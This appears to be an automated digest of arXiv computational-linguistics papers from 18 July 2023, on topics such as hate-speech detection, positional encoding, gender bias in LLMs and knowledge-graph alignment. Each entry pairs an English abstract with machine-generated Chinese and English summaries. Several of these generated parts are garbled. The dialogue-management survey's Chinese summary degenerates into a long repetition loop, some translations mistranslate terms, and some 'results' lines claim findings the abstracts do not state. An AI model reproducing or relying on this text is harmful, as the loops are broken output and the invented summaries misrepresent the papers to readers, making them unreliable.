2023-07-18

cs.CL

cs.CL - 2023-07-18

paper_url: http://arxiv.org/abs/2307.09312
repo_url: https://github.com/liamhebert/multimodaldiscussiontransformer
paper_authors: Liam Hebert, Gaurav Sahu, Nanda Kishore Sreenivas, Lukasz Golab, Robin Cohen
for: 本研究旨在探讨在在线社交网络中推断仇恨言语的多模态graph transformer模型。
methods: 该模型基于文本和图像的共同分析，使用图transformer来捕捉整个讨论的上下文关系，并通过杂交层来结合文本和图像嵌入。
results: 对于基elines进行比较，我们发现我们的模型在推断仇恨言语方面表现出色，并进行了广泛的ablation研究。

Abstract
We present the Multi-Modal Discussion Transformer (mDT), a novel multi-modal graph-based transformer model for detecting hate speech in online social networks. In contrast to traditional text-only methods, our approach to labelling a comment as hate speech centers around the holistic analysis of text and images. This is done by leveraging graph transformers to capture the contextual relationships in the entire discussion that surrounds a comment, with interwoven fusion layers to combine text and image embeddings instead of processing different modalities separately. We compare the performance of our model to baselines that only process text; we also conduct extensive ablation studies. We conclude with future work for multimodal solutions to deliver social value in online contexts, arguing that capturing a holistic view of a conversation greatly advances the effort to detect anti-social behavior.

摘要
我们介绍了多模态讨论变换器（mDT），一种新的多模态图形基于变换器模型，用于在社交网络上探测仇恨言论。与传统的文本只方法不同，我们的方法将注意点在整个讨论环境中心于评论，而不是仅仅是单独处理评论的文本。我们利用图transformers来捕捉讨论中的上下文关系，并使用杂交层来合并文本和图像嵌入。我们与基准方法进行比较，并进行了广泛的剥夺研究。我们认为，捕捉整个对话的全景视图可以大幅提高探测反社会行为的努力。

Mutual Reinforcement Effects in Japanese Sentence Classification and Named Entity Recognition Tasks

paper_url: http://arxiv.org/abs/2307.10291
repo_url: None
paper_authors: Chengguang Gan, Qinghao Zhang, Tatsunori Mori
for: 本研究旨在探讨 sentence classification 和 named entity recognition 的traditional segmentation方法之间的复杂交互关系，以及这两个信息提取子任务之间的互相强制效应。
methods: 本研究提出了一种 Sentence Classification and Named Entity Recognition Multi-task (SCNM) approach，combines Sentence Classification (SC) 和 named entity recognition (NER)。我们还开发了一个 Sentence-to-Label Generation (SLG) 框架，并使用了一个生成模型来生成 SC-标签、NER-标签和相关的文本段落。
results: 我们的结果显示，在 SCNM 中，SC 精度提高了1.13个点，NER 精度提高了1.06个点，并且使用 Constraint Mechanism (CM) 可以提高生成的格式精度。此外，我们还在单独的 SC 任务上实现了 SLG 框架，其性能比基准值更高。在 few-shot learning 实验中，SLG 框架也表现出了更好的性能。

Abstract
Information extraction(IE) is a crucial subfield within natural language processing. However, for the traditionally segmented approach to sentence classification and Named Entity Recognition, the intricate interactions between these individual subtasks remain largely uninvestigated. In this study, we propose an integrative analysis, converging sentence classification with Named Entity Recognition, with the objective to unveil and comprehend the mutual reinforcement effect within these two information extraction subtasks. To achieve this, we introduce a Sentence Classification and Named Entity Recognition Multi-task (SCNM) approach that combines Sentence Classification (SC) and Named Entity Recognition (NER). We develop a Sentence-to-Label Generation (SLG) framework for SCNM and construct a Wikipedia dataset containing both SC and NER. Using a format converter, we unify input formats and employ a generative model to generate SC-labels, NER-labels, and associated text segments. We propose a Constraint Mechanism (CM) to improve generated format accuracy. Our results show SC accuracy increased by 1.13 points and NER by 1.06 points in SCNM compared to standalone tasks, with CM raising format accuracy from 63.61 to 100. The findings indicate mutual reinforcement effects between SC and NER, and integration enhances both tasks' performance. We additionally implemented the SLG framework on single SC task. It yielded superior accuracies compared to the baseline on two distinct Japanese SC datasets. Notably, in the experiment of few-shot learning, SLG framework shows much better performance than fine-tune method. These empirical findings contribute additional evidence to affirm the efficacy of the SLG framework.

摘要
信息提取（IE）是自然语言处理的重要子领域。然而，传统上分割的方法 для句子分类和名实体识别，两个个人任务之间的复杂互动还没有得到了充分的研究。在这一study中，我们提议了一种集成分析，将句子分类与名实体识别集成在一起，以探索和理解这两个信息提取任务之间的互相强化效应。为此，我们提出了一种句子分类和名实体识别多任务（SCNM）方法，将句子分类（SC）和名实体识别（NER）相结合。我们开发了一个句子标签生成（SLG）框架 для SCNM，并使用WIKIPEDIA数据集来构建SC和NER的 dataset。使用一种格式转换器，我们将输入格式统一化，并使用生成模型生成SC标签、NER标签和相关的文本段。我们提出了一种约束机制（CM），以提高生成的格式准确性。我们的结果表明，SCNM比单独任务的SC和NER准确率提高1.13个点和1.06个点，并且CM可以提高格式准确性从63.61%提升到100%。这些实验结果表明，SC和NER之间存在互相强化效应，集成可以提高两个任务的性能。此外，我们还应用SLG框架于单个SC任务，其表现比基eline更高，特别是在几何学学习中。这些实验证据为SLG框架的可效性提供了更多的证据。

Linearized Relative Positional Encoding

paper_url: http://arxiv.org/abs/2307.09270
repo_url: https://github.com/aliutkus/spe
paper_authors: Zhen Qin, Weixuan Sun, Kaiyue Lu, Hui Deng, Dongxu Li, Xiaodong Han, Yuchao Dai, Lingpeng Kong, Yiran Zhong
for: 这个论文是为了研究linear transformer中的相对位置编码方法的设计原理。
methods: 这篇论文使用了一系列现有的linear relative positional encoding方法，并提出了一种基于单位变换的linear relative positional encoding算法家族。
results: 对于语言模型、文本分类和图像分类等应用，LRPE比现有方法更高效，并且可以推导出更多的相对位置编码方法。

Abstract
Relative positional encoding is widely used in vanilla and linear transformers to represent positional information. However, existing encoding methods of a vanilla transformer are not always directly applicable to a linear transformer, because the latter requires a decomposition of the query and key representations into separate kernel functions. Nevertheless, principles for designing encoding methods suitable for linear transformers remain understudied. In this work, we put together a variety of existing linear relative positional encoding approaches under a canonical form and further propose a family of linear relative positional encoding algorithms via unitary transformation. Our formulation leads to a principled framework that can be used to develop new relative positional encoding methods that preserve linear space-time complexity. Equipped with different models, the proposed linearized relative positional encoding (LRPE) family derives effective encoding for various applications. Experiments show that compared with existing methods, LRPE achieves state-of-the-art performance in language modeling, text classification, and image classification. Meanwhile, it emphasizes a general paradigm for designing broadly more relative positional encoding methods that are applicable to linear transformers. The code is available at https://github.com/OpenNLPLab/Lrpe.

摘要
“相对位置编码广泛应用于简单和线性变换器中，以表示位置信息。然而，现有的变换器编码方法不一定直接适用于线性变换器，因为后者需要对查询和关键表示的分解为分立的核函数。然而，适用于线性变换器的编码方法的原则尚未得到充分研究。在这项工作中，我们将现有的线性相对位置编码方法集成到一个共同形式下，并提出一家线性相对位置编码算法via单位变换。我们的表述导致一种原理性的框架，可以用于开发新的相对位置编码方法，保持线性空间时间复杂度。具有不同的模型，我们提出的线性化相对位置编码（LRPE）家族得到了有效的编码，并在语言模型、文本分类和图像分类等应用中达到了状态之arte的性能。同时，我们强调了一种通用的 paradigma для设计更多的相对位置编码方法，适用于线性 transformers。代码可以在https://github.com/OpenNLPLab/Lrpe 上下载。”

Text vectorization via transformer-based language models and n-gram perplexities

paper_url: http://arxiv.org/abs/2307.09255
repo_url: None
paper_authors: Mihailo Škorić
For: This paper aims to address the limitations of using scalar perplexity as a measure of text quality, and instead proposes a new method based on vector values that take into account the probability distribution of individual tokens within the input.* Methods: The proposed method uses n-gram perplexities to calculate the relative perplexity of each text token, and combines these values into a single vector representing the input. This approach allows for a more nuanced assessment of text quality, taking into account the probability distribution of individual tokens as well as their overall probability.* Results: The authors evaluate the effectiveness of their proposed method using several experiments, and show that it outperforms traditional scalar perplexity measures in terms of accurately assessing text quality. They also demonstrate the applicability of their method to a variety of natural language processing tasks, including language modeling and text classification.

Abstract
As the probability (and thus perplexity) of a text is calculated based on the product of the probabilities of individual tokens, it may happen that one unlikely token significantly reduces the probability (i.e., increase the perplexity) of some otherwise highly probable input, while potentially representing a simple typographical error. Also, given that perplexity is a scalar value that refers to the entire input, information about the probability distribution within it is lost in the calculation (a relatively good text that has one unlikely token and another text in which each token is equally likely they can have the same perplexity value), especially for longer texts. As an alternative to scalar perplexity this research proposes a simple algorithm used to calculate vector values based on n-gram perplexities within the input. Such representations consider the previously mentioned aspects, and instead of a unique value, the relative perplexity of each text token is calculated, and these values are combined into a single vector representing the input.

摘要
随着文本中每个Token的概率产生产品，可能出现一个不太可能的Token会减少整体概率（即增加plexity），而这可能只是一个简单的字母输入错误。此外，由于plexity是一个Scalar值，它对整个输入的概率分布信息失去了信息（两个相对较好的文本，每个Token的概率相同，可能有同样的plexity值），尤其是 для longer texts。作为一种 alternativescalar perplexity，这些研究提出了一种简单的算法，用于计算基于n-gram perplexity的输入 vector值。这些表示器考虑了上述因素，而不是单个值，每个文本Token的概率值被计算，并将这些值组合成一个表示输入的单个vectors。

PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models

paper_url: http://arxiv.org/abs/2307.09254
repo_url: None
paper_authors: Sangdon Park, Taesoo Kim
for: 本研究旨在提高模型的可靠性，通过不确定学习和模型评估来提高模型的可靠性。
methods: 本研究提出了一种基于神经网络 Parametric Neural Prediction Set（PNS）模型，可以为生成语言模型（GLM）中的不确定性进行精确评估，同时仍保持可靠性。
results: 对四种语言数据集和六种模型进行测试，结果显示，与标准基eline方法相比，本方法可以提高评估的不确定性精度，平均提高63%。

Abstract
Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to the concerns on generating hallucinated facts. In this paper, we propose to learn neural prediction set models that comes with the probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification but still satisfies the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.

摘要
<>转换给定文本到简化中文。>模型不确定性学习和量化是提高模型可靠性的关键任务。特别是最近的生成语言模型（GLMs）使得需要可靠的不确定量化，因为担心生成幻见的情况。在这篇论文中，我们提议通过神经网络来学习预测集模型，这些模型具有可靠的不确定量化保证（PAC），用于量化 GLMs 的不确定性。与现有的预测集模型不同，我们的模型通过神经网络来Parameterize预测集，实现更精确的不确定量化，仍满足 PAC 保证。我们在四种语言 dataset 和六种模型上进行了证明，并示出了我们的方法可以在平均上提高量化不确定性的比例达到 63%，相比标准基准方法。

Unveiling Gender Bias in Terms of Profession Across LLMs: Analyzing and Addressing Sociological Implications

paper_url: http://arxiv.org/abs/2307.09162
repo_url: None
paper_authors: Vishesh Thakur
for: 这种研究旨在分析大语言模型（LLM）中的性别偏见，尤其是GPT-2和GPT-3.5两种知名语言模型，以更好地理解其影响。
methods: 这项研究使用了文献综述、数据收集和处理、深入量化分析等方法，以评估LLM中的性别偏见。
results: 研究发现了 gendered word associations、语言使用和biased narratives在LLM中的存在，并讨论了这些现象的伦理含义和可能的社会影响。

Abstract
Gender bias in artificial intelligence (AI) and natural language processing has garnered significant attention due to its potential impact on societal perceptions and biases. This research paper aims to analyze gender bias in Large Language Models (LLMs) with a focus on multiple comparisons between GPT-2 and GPT-3.5, some prominent language models, to better understand its implications. Through a comprehensive literature review, the study examines existing research on gender bias in AI language models and identifies gaps in the current knowledge. The methodology involves collecting and preprocessing data from GPT-2 and GPT-3.5, and employing in-depth quantitative analysis techniques to evaluate gender bias in the generated text. The findings shed light on gendered word associations, language usage, and biased narratives present in the outputs of these Large Language Models. The discussion explores the ethical implications of gender bias and its potential consequences on social perceptions and marginalized communities. Additionally, the paper presents strategies for reducing gender bias in LLMs, including algorithmic approaches and data augmentation techniques. The research highlights the importance of interdisciplinary collaborations and the role of sociological studies in mitigating gender bias in AI models. By addressing these issues, we can pave the way for more inclusive and unbiased AI systems that have a positive impact on society.

摘要
人工智能（AI）和自然语言处理（NLP）中的性别偏见已经引起了社会的关注，因为它可能对社会观念和偏见产生影响。这篇研究论文的目的是分析LLMs中的性别偏见，以GPT-2和GPT-3.5两个著名的语言模型作为研究对象，以更好地了解其影响。通过对现有的AI语言模型性别偏见研究进行抽查，本研究发现了现有的知识空白。方法包括收集和处理GPT-2和GPT-3.5数据，并使用深入的量化分析技术来评估这些语言模型生成的文本中的性别偏见。发现结果指出了这些大语言模型生成的 gendered word associations、语言使用和偏执的 narraves 中的性别偏见。讨论探讨了性别偏见的伦理问题和可能对社会观念和边缘社群产生的影响。此外，论文还提出了减少LLMs中性别偏见的策略，包括算法方法和数据增强技术。研究强调了多学科合作和社会学研究的重要性，以消除性别偏见在AI模型中的问题，以便为社会带来更加包容和无偏见的AI系统。

Attention over pre-trained Sentence Embeddings for Long Document Classification

paper_url: http://arxiv.org/abs/2307.09084
repo_url: None
paper_authors: Amine Abdaoui, Sourav Dutta
for: 本研究旨在提高 transformer 模型在长文本处理中的性能，解决 transformer 模型在长序列上的 quadratic attention 复杂性问题。
methods: 本研究使用 pre-trained sentence transformers 开始自己的含义性 embedding，然后通过一个小的注意层将它们组合，注意层的长度 linearly 增长于文档长度。
results: 研究获得了三个标准文档分类数据集上的竞争性result，与现有的 state-of-the-art 模型 using standard fine-tuning 相比， studied 方法 obtains 竞争性result，而且在冰transformer 下也可以获得更好的result。

Abstract
Despite being the current de-facto models in most NLP tasks, transformers are often limited to short sequences due to their quadratic attention complexity on the number of tokens. Several attempts to address this issue were studied, either by reducing the cost of the self-attention computation or by modeling smaller sequences and combining them through a recurrence mechanism or using a new transformer model. In this paper, we suggest to take advantage of pre-trained sentence transformers to start from semantically meaningful embeddings of the individual sentences, and then combine them through a small attention layer that scales linearly with the document length. We report the results obtained by this simple architecture on three standard document classification datasets. When compared with the current state-of-the-art models using standard fine-tuning, the studied method obtains competitive results (even if there is no clear best model in this configuration). We also showcase that the studied architecture obtains better results when freezing the underlying transformers. A configuration that is useful when we need to avoid complete fine-tuning (e.g. when the same frozen transformer is shared by different applications). Finally, two additional experiments are provided to further evaluate the relevancy of the studied architecture over simpler baselines.

摘要
尽管现在大多数NLP任务中是使用trasnformer作为现实模型，但trasnformer通常只能处理短序列，因为它们的自我注意计算复杂度与序列长度成 quadratic关系。为了解决这个问题，一些研究将 concentrate 在减少自我注意计算成本或者使用回归机制或者新的trasnformer模型。在这篇论文中，我们建议利用预训练的句子trasnformer来获得含义rich的句子embeddings，然后通过一个小的注意层将它们相互组合，注意层的计算复杂度与文档长度成直线关系。我们在三个标准的文档分类数据集上进行了测试，与现有状态的艺术模型进行标准微调相比，我们的方法可以获得竞争力强的结果（即使没有明确的最佳模型）。我们还展示了在冻结下面trasnformer时，该方法可以获得更好的结果。这种配置是当我们需要避免完全微调（例如，当同一个冻结的trasnformer被分配给不同的应用程序）时 particualrly useful。最后，我们还提供了两个额外的实验，以进一步评估研究的建议。

Towards a Neural Era in Dialogue Management for Collaboration: A Literature Survey

paper_url: http://arxiv.org/abs/2307.09021
repo_url: None
paper_authors: Amogh Mannekote
for: 本文旨在探讨对话管理技术在协作对话系统中的应用，以便实现对话系统与人类在协作问题解决、创新探索和社交支持中的合作。
methods: 本文首先介绍了协作对话系统中对话管理的发展历史，从传统的手工和信息状态基础方法到基于人工智能规划的方法。然后，它转移到了当代数据驱动对话管理技术，强调将深度学习成功应用于协作上。
results: 本文分析了一些最近的 neural 方法在协作对话管理中的应用，探讨了当前领域的主要趋势。这篇文章希望能为未来对话管理技术的发展提供基础背景，特别是在对话系统社区开始接受大语言模型的情况下。

Abstract
Dialogue-based human-AI collaboration can revolutionize collaborative problem-solving, creative exploration, and social support. To realize this goal, the development of automated agents proficient in skills such as negotiating, following instructions, establishing common ground, and progressing shared tasks is essential. This survey begins by reviewing the evolution of dialogue management paradigms in collaborative dialogue systems, from traditional handcrafted and information-state based methods to AI planning-inspired approaches. It then shifts focus to contemporary data-driven dialogue management techniques, which seek to transfer deep learning successes from form-filling and open-domain settings to collaborative contexts. The paper proceeds to analyze a selected set of recent works that apply neural approaches to collaborative dialogue management, spotlighting prevailing trends in the field. This survey hopes to provide foundational background for future advancements in collaborative dialogue management, particularly as the dialogue systems community continues to embrace the potential of large language models.

摘要
对话基于人工智能的合作可能会革命化协作问题解决、创新探索和社交支持。为实现这一目标，自动化代理人具备谈判、遵从指令、确立共同基础和共同任务进展的技能是非常重要的。这篇评论从合作对话系统的话语管理 парадиг进行了回顾，从传统的手工和信息状态基础方法到人工智能规划引用的方法。然后shift关注当今的数据驱动对话管理技术，它们希望通过将深度学习成功转移到开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中的形式填充和开放领域中

On the (In)Effectiveness of Large Language Models for Chinese Text Correction

paper_url: http://arxiv.org/abs/2307.09007
repo_url: None
paper_authors: Yinghui Li, Haojing Huang, Shirong Ma, Yong Jiang, Yangning Li, Feng Zhou, Hai-Tao Zheng, Qingyu Zhou
for: 这个论文主要是研究 chatGPT 在中文自然语言处理 tasks 中的表现，具体来说是在中文语法错误检测和中文拼写检测两个场景下。
methods: 作者使用了 chatGPT 作为基础模型，并进行了 fine-tuning 以适应中文语言处理任务。
results: 研究发现，chatGPT 在中文语法错误检测和中文拼写检测两个场景下的表现具有极高的水平，但也存在一些不满足的问题。

Abstract
Recently, the development and progress of Large Language Models (LLMs) have amazed the entire Artificial Intelligence community. As an outstanding representative of LLMs and the foundation model that set off this wave of research on LLMs, ChatGPT has attracted more and more researchers to study its capabilities and performance on various downstream Natural Language Processing (NLP) tasks. While marveling at ChatGPT's incredible performance on kinds of tasks, we notice that ChatGPT also has excellent multilingual processing capabilities, such as Chinese. To explore the Chinese processing ability of ChatGPT, we focus on Chinese Text Correction, a fundamental and challenging Chinese NLP task. Specifically, we evaluate ChatGPT on the Chinese Grammatical Error Correction (CGEC) and Chinese Spelling Check (CSC) tasks, which are two main Chinese Text Correction scenarios. From extensive analyses and comparisons with previous state-of-the-art fine-tuned models, we empirically find that the ChatGPT currently has both amazing performance and unsatisfactory behavior for Chinese Text Correction. We believe our findings will promote the landing and application of LLMs in the Chinese NLP community.

摘要
(Simplified Chinese translation)最近，大语言模型（LLMs）的发展和进步，让整个人工智能社区感到惊叹。作为LLMs的代表之一，以及这波研究的基础模型，ChatGPT已经吸引了越来越多的研究人员研究其能力和表现在不同的自然语言处理（NLP）任务上。而在观察ChatGPT的惊人表现的同时，我们也注意到ChatGPT在多种语言处理任务上表现出色，包括中文。为了探索ChatGPT在中文处理能力方面的可能性，我们专注于中文文法错误 corrections和中文拼写检查两个主要的中文文本修正enario。经过广泛的分析和对前一些State-of-the-art fine-tuned模型的比较，我们发现ChatGPT在中文文本修正方面具有惊人的表现和不满的行为。我们认为我们的发现将推动LLMs在中文NLP社区的应用。

Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning

paper_url: http://arxiv.org/abs/2307.10274
repo_url: https://github.com/mtkresearch/clairaudience
paper_authors: Feng-Ting Liao, Yung-Chieh Chan, Yi-Chang Chen, Chan-Jan Hsu, Da-shan Shiu
for: 这个论文旨在创建域特性敏感的语音识别模型，通过将文本域信息纳入模型生成过程来提高模型的表达准确性。
methods: 这个方法利用了一个预训练的端到端模型（Whisper），通过示例示例学习来让模型学习域特性。我们还扩展了这个方法，使其能够在文本 только fine-tuning 的情况下实现域特性和域适应。
results: 我们的模型在不同的域和提示上进行了评测，结果显示，模型在未经见过的数据集上可以实现 Word Error Rate（WER）下降达33%，而文本只 fine-tuning 的模型在医学对话数据集上可以达到最大的 WER 下降达29%。

Abstract
In this work, we propose a method to create domain-sensitive speech recognition models that utilize textual domain information by conditioning its generation on a given text prompt. This is accomplished by fine-tuning a pre-trained, end-to-end model (Whisper) to learn from demonstrations with prompt examples. We show that this ability can be generalized to different domains and even various prompt contexts, with our model gaining a Word Error Rate (WER) reduction of up to 33% on unseen datasets from various domains, such as medical conversation, air traffic control communication, and financial meetings. Considering the limited availability of audio-transcript pair data, we further extend our method to text-only fine-tuning to achieve domain sensitivity as well as domain adaptation. We demonstrate that our text-only fine-tuned model can also attend to various prompt contexts, with the model reaching the most WER reduction of 29% on the medical conversation dataset.

摘要
在这个工作中，我们提出了一种方法，用于创建域特定的语音识别模型，该模型利用文本域信息，通过给定文本示例来定制其生成。我们通过练习示例来训练一个预训练的、端到端模型（Whisper），以便从示例中学习。我们发现这种能力可以泛化到不同的域和不同的提示上下文中，我们在不同领域的未seen数据上实现了Word Error Rate（WER）的减少，最高达33%。针对缺乏语音-转录对数据的限制，我们进一步扩展了我们的方法，以文本 solo 精度为基础，实现域特定性和域适应性。我们示示了我们的文本 solo 精度模型可以attend到不同的提示上下文，并在医学对话数据集上达到最高的WER减少29%。

AutoAlign: Fully Automatic and Effective Knowledge Graph Alignment enabled by Large Language Models

paper_url: http://arxiv.org/abs/2307.11772
repo_url: None
paper_authors: Rui Zhang, Yixin Su, Bayu Distiawan Trisedya, Xiaoyan Zhao, Min Yang, Hong Cheng, Jianzhong Qi
for: automatic entity alignment between knowledge graphs (KGs)
methods: constructs a predicate-proximity-graph with the help of large language models, computes entity embeddings using TransE, and shifts the two KGs’ entity embeddings into the same vector space based on attribute similarity
results: improves the performance of entity alignment significantly compared to state-of-the-art methods

Abstract
The task of entity alignment between knowledge graphs (KGs) aims to identify every pair of entities from two different KGs that represent the same entity. Many machine learning-based methods have been proposed for this task. However, to our best knowledge, existing methods all require manually crafted seed alignments, which are expensive to obtain. In this paper, we propose the first fully automatic alignment method named AutoAlign, which does not require any manually crafted seed alignments. Specifically, for predicate embeddings, AutoAlign constructs a predicate-proximity-graph with the help of large language models to automatically capture the similarity between predicates across two KGs. For entity embeddings, AutoAlign first computes the entity embeddings of each KG independently using TransE, and then shifts the two KGs' entity embeddings into the same vector space by computing the similarity between entities based on their attributes. Thus, both predicate alignment and entity alignment can be done without manually crafted seed alignments. AutoAlign is not only fully automatic, but also highly effective. Experiments using real-world KGs show that AutoAlign improves the performance of entity alignment significantly compared to state-of-the-art methods.

摘要
《EntityAlignment》是一个知识 graphs（KGs）中的任务，旨在将每个来自不同KGs的实体对应到同一个实体。许多机器学习基于方法已经被提出来解决这个任务。然而，我们所知道的所有方法都需要手动制作的种子对Alignment，这是 expensive的。在这篇论文中，我们提出了第一个完全自动的对Alignment方法，即AutoAlign，不需要任何手动制作的种子对Alignment。为 predicate embeddings，AutoAlign使用大型自然语言模型来自动捕捉两个KGs中 predicate的相似性，并构建一个 predicate-proximity-graph。为 entity embeddings，AutoAlign先使用TransE计算每个KG的独立实体表示，然后通过计算实体 attribute 的相似性来将两个KGs的实体表示Shift到同一个vector space中。因此， predicate alignment和entity alignment都可以通过自动生成的种子对Alignment来完成，不需要手动制作种子对Alignment。AutoAlign不仅是完全自动的，还是非常有效的。在实际世界KGs上进行实验，AutoAlign signicicantly improvese the performance of entity alignment，比对 estado-of-the-art 方法更高。

Mitigating Label Bias via Decoupled Confident Learning

paper_url: http://arxiv.org/abs/2307.08945
repo_url: None
paper_authors: Yunyi Li, Maria De-Arteaga, Maytal Saar-Tsechansky
for: Mitigating algorithmic bias and addressing label bias in training data.
methods: Decoupled Confident Learning (DeCoLe) pruning method to identify and remove biased labels.
results: Successfully identified biased labels and outperformed competing approaches in the context of hate speech detection.Here’s the full text in Simplified Chinese:
for: 本文旨在 Mitigating algorithmic bias 和Addressing label bias 在训练数据中。
methods: 本文提出了 Decoupled Confident Learning (DeCoLe) 的架构，通过特有的采集方法来发现和移除偏见标签。
results: 在 hate speech detection 中应用 DeCoLe，成功发现了偏见标签，并超过了竞争方法的性能。

Abstract
Growing concerns regarding algorithmic fairness have led to a surge in methodologies to mitigate algorithmic bias. However, such methodologies largely assume that observed labels in training data are correct. This is problematic because bias in labels is pervasive across important domains, including healthcare, hiring, and content moderation. In particular, human-generated labels are prone to encoding societal biases. While the presence of labeling bias has been discussed conceptually, there is a lack of methodologies to address this problem. We propose a pruning method -- Decoupled Confident Learning (DeCoLe) -- specifically designed to mitigate label bias. After illustrating its performance on a synthetic dataset, we apply DeCoLe in the context of hate speech detection, where label bias has been recognized as an important challenge, and show that it successfully identifies biased labels and outperforms competing approaches.

摘要
众所周知的算法公平性问题已导致一系列方法来减少算法偏见。然而，这些方法假设训练数据中所观察到的标签是正确的。这是一个问题，因为标签偏见是重要领域，如医疗、招聘和内容审核中的普遍存在。人类生成的标签容易带有社会偏见。虽然标签偏见的存在已经被描述了，但是没有有效的方法来解决这个问题。我们提议一种剪除方法——分离确定学习（DeCoLe）——特意设计来减少标签偏见。在一个人工数据集上验证其性能后，我们在仇恨言语检测中应用DeCoLe，并显示它成功地识别偏见标签，并超过其他方法的表现。

NTK-approximating MLP Fusion for Efficient Language Model Fine-tuning

paper_url: http://arxiv.org/abs/2307.08941
repo_url: https://github.com/weitianxin/mlp_fusion
paper_authors: Tianxin Wei, Zeming Guo, Yifan Chen, Jingrui He
for: 这篇论文的目的是提出一种可靠地将大型语言模型（PLM）转换为轻量级语言模型（MLP），并且在不需要大量训练数据和 computation 的情况下，实现 PLM 的 fine-tuning。
methods: 这篇论文使用了 neural tangent kernel（NTK）的想法，将多层感知器（MLP）组件看作是一个组件，并将其分成一定数量的中心点，然后将这些中心点 Restore 为一个轻量级的 MLP，并证明这个方法可以将 NTK 的 PLM 转换为轻量级 MLP。
results: 这篇论文的实验结果显示，使用 proposed method 可以实现 PLM fine-tuning 的目的，并且在自然语言理解（NLU）和自然语言生成（NLG）任务上都有很好的效果。

Abstract
Fine-tuning a pre-trained language model (PLM) emerges as the predominant strategy in many natural language processing applications. However, even fine-tuning the PLMs and doing inference are expensive, especially on edge devices with low computing power. Some general approaches (e.g. quantization and distillation) have been widely studied to reduce the compute/memory of PLM fine-tuning, while very few one-shot compression techniques are explored. In this paper, we investigate the neural tangent kernel (NTK)--which reveals the gradient descent dynamics of neural networks--of the multilayer perceptrons (MLP) modules in a PLM and propose to coin a lightweight PLM through NTK-approximating MLP fusion. To achieve this, we reconsider the MLP as a bundle of sub-MLPs, and cluster them into a given number of centroids, which can then be restored as a compressed MLP and surprisingly shown to well approximate the NTK of the original PLM. Extensive experiments of PLM 